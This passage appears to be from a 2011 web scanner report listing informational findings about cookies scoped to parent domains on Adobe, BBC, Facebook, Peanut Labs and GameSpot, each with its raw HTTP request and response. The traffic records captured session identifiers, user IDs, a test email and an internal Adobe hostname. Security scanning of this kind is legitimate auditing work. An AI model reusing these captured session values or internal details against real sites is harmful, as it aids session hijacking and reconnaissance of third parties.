"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<HTML xmlns="http://www.w3.org
...[SNIP]...

9.46. http://www.adobe.com/cfusion/store/html/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.adobe.com
Path:	/cfusion/store/html/index.cfm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=1C5EDFD1%2D05E9%2D05EA%2DB2D2E9C8D3280AAA;domain=.adobe.com;expires=Tue, 01-Jan-2041 05:25:36 GMT;path=/cfusion/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cfusion/store/html/index.cfm HTTP/1.1
Host: www.adobe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 09 Jan 2011 05:25:36 GMT
Server: JRun Web Server
Set-Cookie: CFID=7135066;expires=Tue, 01-Jan-2041 05:25:36 GMT;path=/
Set-Cookie: CFTOKEN=eca79c32bda4a00c-1C5EDF8A-A024-3155-A1E063E78597F2A8;expires=Tue, 01-Jan-2041 05:25:36 GMT;path=/
Set-Cookie: DYLANSESSIONID=4830c330b1c2e2e067590474170483e7e535;path=/
Set-Cookie: UID=1C5EDFD1%2D05E9%2D05EA%2DB2D2E9C8D3280AAA;domain=.adobe.com;expires=Tue, 01-Jan-2041 05:25:36 GMT;path=/cfusion/
Set-Cookie: CFAUTHORIZATION_adobe_com=;expires=Sat, 09-Jan-2010 05:25:36 GMT;path=/cfusion
Content-Type: text/html; charset=UTF-8
X-Adobe-Zip: true
Environment: webapp-da1-01.corp.adobe.com:8800
Content-Language: en-US
Content-Language: en-US
location: http://store1.adobe.com/cfusion/store/html/index.cfm
Set-Cookie: DylanApp-BigIP=172782602.24610.0000; path=/
Content-Length: 0
Connection: close

9.47. http://www.adobe.com/cfusion/support/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.adobe.com
Path:	/cfusion/support/index.cfm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=1C5AC330%2DA7F4%2DF77C%2D6D6B4B0B159D5F71;domain=.adobe.com;expires=Tue, 01-Jan-2041 05:25:13 GMT;path=/cfusion/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cfusion/support/index.cfm HTTP/1.1
Host: www.adobe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 09 Jan 2011 05:25:13 GMT
Server: JRun Web Server
Set-Cookie: CFID=7126388;expires=Tue, 01-Jan-2041 05:25:13 GMT;path=/
Set-Cookie: CFTOKEN=d9b8ca39e6af1b8d-1C5AC309-AFF5-561E-C02FB9A9A70C0A84;expires=Tue, 01-Jan-2041 05:25:13 GMT;path=/
Set-Cookie: DYLANSESSIONID=483091709039af2c2535f29177f7e63d4c5e;path=/
Set-Cookie: UID=1C5AC330%2DA7F4%2DF77C%2D6D6B4B0B159D5F71;domain=.adobe.com;expires=Tue, 01-Jan-2041 05:25:13 GMT;path=/cfusion/
Set-Cookie: CFAUTHORIZATION_adobe_com=;expires=Sat, 09-Jan-2010 05:25:13 GMT;path=/cfusion
Content-Type: text/html; charset=UTF-8
X-Adobe-Zip: true
Environment: webapp-da1-02.corp.adobe.com:8800
Content-Language: en-US
Content-Language: en-US
location: https://www.adobe.com/cfusion/support/index.cfm
Set-Cookie: DylanApp-BigIP=223114250.24610.0000; path=/
Content-Length: 0
Connection: close

9.48. http://www.adobe.com/events/main.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.adobe.com
Path:	/events/main.jsp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

AWID=10.116.66.9.1294550851826;path=/;domain=.adobe.com;expires=Tue, 05-Jan-2021 21:27:31 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/main.jsp HTTP/1.1
Host: www.adobe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.49. http://www.bbc.co.uk/news/technology-12126880 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bbc.co.uk
Path:	/news/technology-12126880

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

BBC-UID=048d5239a18139fc2bddb11a61903f97169352767050f19f02f9f6849e4a283c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Mon, 09-Jan-12 01:38:36 GMT; path=/; domain=bbc.co.uk;
BBC-UID=048d5239a18139fc2bddb11a61903f97169352767050f19f02f9f6849e4a283c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Mon, 09-Jan-12 01:38:36 GMT; path=/; domain=bbc.co.uk;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/technology-12126880 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.50. http://www.e00.peanutlabs.com/js/iFrame/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.e00.peanutlabs.com
Path:	/js/iFrame/index.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

dob=deleted; expires=Sat, 09-Jan-2010 01:30:20 GMT; path=/; domain=.peanutlabs.com
sex=deleted; expires=Sat, 09-Jan-2010 01:30:20 GMT; path=/; domain=.peanutlabs.com
pl_email=deleted; expires=Sat, 09-Jan-2010 01:30:21 GMT; path=/; domain=.peanutlabs.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /js/iFrame/index.php?userId=998826224-3432-8939b981e2 HTTP/1.1
Host: www.e00.peanutlabs.com
Proxy-Connection: keep-alive
Referer: http://www.peanutlabs.com/userGreeting.php?userId=998826224-3432-8939b981e2&var_val_1=10010&var_key_1=zipcode
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; pl_user_id=8939b981e2-5329197bbf0fb46f475fdce27e545262; pl_lang=en_US; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; __utmc=184043431; __utmb=184043431.1.10.1294536629

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Cache-control: no-cache="set-cookie"
Content-Type: text/html
Date: Sun, 09 Jan 2011 01:30:21 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache
Set-Cookie: dob=deleted; expires=Sat, 09-Jan-2010 01:30:20 GMT; path=/; domain=.peanutlabs.com
Set-Cookie: sex=deleted; expires=Sat, 09-Jan-2010 01:30:20 GMT; path=/; domain=.peanutlabs.com
Set-Cookie: pl_email=deleted; expires=Sat, 09-Jan-2010 01:30:21 GMT; path=/; domain=.peanutlabs.com
Set-Cookie: AWSELB=052955471CE77557C5059B093FDB80564CA14D691772F16F2083BC8247835042071AB0E5EE05720064753CC7EA313DAFB2493BDCE9D100F7791BFE5D631D63157368D3863F;MAX-AGE=600
Vary: Accept-Encoding,User-Agent
Connection: keep-alive
Content-Length: 112603

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

       <!-- If
...[SNIP]...

9.51. http://www.facebook.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

lsd=A2E-W; path=/; domain=.facebook.com
reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x23; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%26extra_2%3DUS;

Response

9.52. http://www.facebook.com/2008/fbml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/2008/fbml

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

lsd=zoSHS; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /2008/fbml HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x23; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%26extra_2%3DUS;

Response

9.53. http://www.facebook.com/Pogo previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/Pogo

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

lsd=DGAoC; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Pogo HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x23; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%26extra_2%3DUS;

Response

9.54. http://www.facebook.com/campaign/impression.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/campaign/impression.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%253Fext_reg%253D1%26extra_2%3DUS; expires=Tue, 08-Feb-2011 01:23:22 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campaign/impression.php?campaign_id=137675572948107&partner_id=pandora.com&placement=like_button&extra_1=http%3A%2F%2Fwww.pandora.com%2F%3Fext_reg%3D1&extra_2=US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Ffacebook.com%2Fzync&layout=standard&show_faces=false&width=200&action=like&colorscheme=light&height=40
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dcmsinter.net%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.cmsinter.net%252Fblog%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 43
Content-Type: image/gif
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%253Fext_reg%253D1%26extra_2%3DUS; expires=Tue, 08-Feb-2011 01:23:22 GMT; path=/; domain=.facebook.com; httponly
X-Cnection: close
Date: Sun, 09 Jan 2011 01:23:22 GMT

GIF89a.............!.......,...........D..;

9.55. http://www.facebook.com/campaign/landing.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/campaign/landing.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

campaign_click_url=%2Fcampaign%2Flanding.php; expires=Tue, 08-Feb-2011 01:43:45 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campaign/landing.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dcmsinter.net%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.cmsinter.net%252Fblog%252F%26extra_2%3DUS;

Response

HTTP/1.1 302 Found
Location: http://www.facebook.com/
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: campaign_click_url=%2Fcampaign%2Flanding.php; expires=Tue, 08-Feb-2011 01:43:45 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sun, 09 Jan 2011 01:43:45 GMT
Content-Length: 0

9.56. http://www.facebook.com/event.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/event.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

lsd=1_yt8; path=/; domain=.facebook.com
next=http%3A%2F%2Fwww.facebook.com%2Fevent.php%3Feid%3D139663112758241; path=/; domain=.facebook.com; httponly
next_path=%2Fevent.php%3Feid%3D139663112758241; path=/; domain=.facebook.com; httponly
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /event.php?eid=139663112758241 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x23; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/login.php
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=1_yt8; path=/; domain=.facebook.com
Set-Cookie: next=http%3A%2F%2Fwww.facebook.com%2Fevent.php%3Feid%3D139663112758241; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=%2Fevent.php%3Feid%3D139663112758241; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sun, 09 Jan 2011 05:20:48 GMT
Content-Length: 0

9.57. http://www.facebook.com/logout.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/logout.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

lsd=77KNI; path=/; domain=.facebook.com
roadblock=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /logout.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x23; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=77KNI; path=/; domain=.facebook.com
Set-Cookie: roadblock=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sun, 09 Jan 2011 05:18:12 GMT
Content-Length: 0

9.58. http://www.facebook.com/pages/Packet-Storm-Security/116613458352817 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/Packet-Storm-Security/116613458352817

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

lsd=USH4D; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pages/Packet-Storm-Security/116613458352817 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x23; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%26extra_2%3DUS;

Response

9.59. http://www.facebook.com/peanutlabs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/peanutlabs

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

lsd=WrbZx; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /peanutlabs HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x23; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%26extra_2%3DUS;

Response

9.60. http://www.facebook.com/sitetour/connect.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/sitetour/connect.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

lsd=4KsQr; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sitetour/connect.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x23; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/instantpersonalization/
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=4KsQr; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sun, 09 Jan 2011 05:17:22 GMT
Content-Length: 0

9.61. https://www.facebook.com/login.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/login.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

datr=ac4nTYEA6yNv1vkgFgkPGkCj; expires=Tue, 08-Jan-2013 05:27:42 GMT; path=/; domain=.facebook.com; httponly
lsd=tJ98F; path=/; domain=.facebook.com
reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x23; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; expires=Tue, 08-Jan-2013 05:27:42 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=tJ98F; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sun, 09 Jan 2011 05:27:42 GMT
Content-Length: 16799

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

9.62. http://www.gamespot.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gamespot.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

geolocn=MTczLjE5My4yMTQuMjQzOjg0MDo2MjM%3D; expires=Tue, 08-Feb-2011 01:43:55 GMT; path=/; domain=.gamespot.com
ctk=NGQyOTEyZGJhZGMxZDZmMzEyMjkyNmUwMDViNQ%3D%3D; expires=Fri, 08-Jul-2011 01:43:55 GMT; path=/; domain=.gamespot.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.gamespot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.63. http://www.peanutlabs.com/core.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.peanutlabs.com
Path:	/core.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

pl_email=test4%40fastdial.net; expires=Tue, 08-Feb-2011 01:34:42 GMT; path=/; domain=.peanutlabs.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core.php?coreClass=IdCmd&cmd=init&module=user&email=&userId=998826224-3432-8939b981e2&user_id=998826224-3432-8939b981e2&writer=JSONManualCmdWriter&minIndex=0&maxIndex=4&back=undefined&category=&standbyIcon=undefined&iframe_tag=&rewardAvailable=&coreName=CmdCore HTTP/1.1
Host: www.peanutlabs.com
Proxy-Connection: keep-alive
Referer: http://www.peanutlabs.com/userGreeting.php?userId=998826224-3432-8939b981e2&var_val_1=10010&var_key_1=zipcode
X-Requested-With: XMLHttpRequest
Accept: application/json, text/javascript, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; pl_lang=en_US; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; __utmc=184043431; __utmb=184043431.1.10.1294536629; pl_user_id=8939b981e2-5329197bbf0fb46f475fdce27e545262

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 01:34:42 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: pl_email=test4%40fastdial.net; expires=Tue, 08-Feb-2011 01:34:42 GMT; path=/; domain=.peanutlabs.com
Vary: Accept-Encoding,User-Agent
Content-Type: text/javascript
Content-Length: 26985

{"uid":"12633542","user_id":"998826224-3432-8939b981e2","network_uid":"998826224-1-3432.sa","created":"2011-01-08 20:33:15","verified":"0","id":"12633542","name":"Pogo Subs","email":"test4@fastdial.ne
...[SNIP]...

9.64. http://www.peanutlabs.com/pl/profileSurveyRegister.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.peanutlabs.com
Path:	/pl/profileSurveyRegister.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

pl_user_id=8939b981e2-5329197bbf0fb46f475fdce27e545262; expires=Mon, 09-Jan-2012 01:34:41 GMT; path=/; domain=.peanutlabs.com
pl_profile=deleted; expires=Sat, 09-Jan-2010 01:34:40 GMT; path=/; domain=.peanutlabs.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

